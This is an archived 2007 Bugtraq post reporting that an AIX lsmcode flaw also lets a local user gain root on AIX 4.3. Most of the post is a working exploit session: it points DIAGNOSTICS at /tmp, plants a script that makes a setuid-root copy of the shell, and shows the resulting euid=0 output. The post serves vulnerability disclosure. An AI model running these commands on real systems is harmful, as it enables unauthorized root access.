Bugtraq mailing list archives
AIX 4.3 lsmcode local root command execution
From: pr1nce_empire () yahoo com
Date: 30 Mar 2007 03:21:57 -0000
It has been reported on http://www.securityfocus.com/bid/18114/ about this vulnerability in AIX 5.1 - 5.3, some exploits is published in milw0rm to exploits this issue http://milw0rm.com/exploits/701 I have an AIX 4.3 box and it seems vulnerable with this issue too bash-2.04$ mkdirhier /tmp/aap/bin bash-2.04$ export DIAGNOSTICS=/tmp/aap bash-2.04$ cat > /tmp/aap/bin/Dctrl << EOF
#!/bin/sh cp /bin/sh /tmp/.shh chown root:system /tmp/.shh chmod u+s /tmp/.shh EOF
bash-2.04$ cat /tmp/aap/bin/Dctrl #!/bin/sh cp /bin/sh /tmp/.shh chown root:system /tmp/.shh chmod u+s /tmp/.shh bash-2.04$ chmod a+x /tmp/aap/bin/Dctrl bash-2.04$ lsmcode bash-2.04$ /tmp/.shh # id uid=221(xxx) gid=53(xxx) euid=0(root) groups=0(system),58(xxx) --> gotcha euid=0 Yeah, even uid=221 but euid=0 Nothing new in this post, i just want to report that AIX 4.3 is vulnerable with this issue too AO
Current thread:
- AIX 4.3 lsmcode local root command execution pr1nce_empire (Mar 30)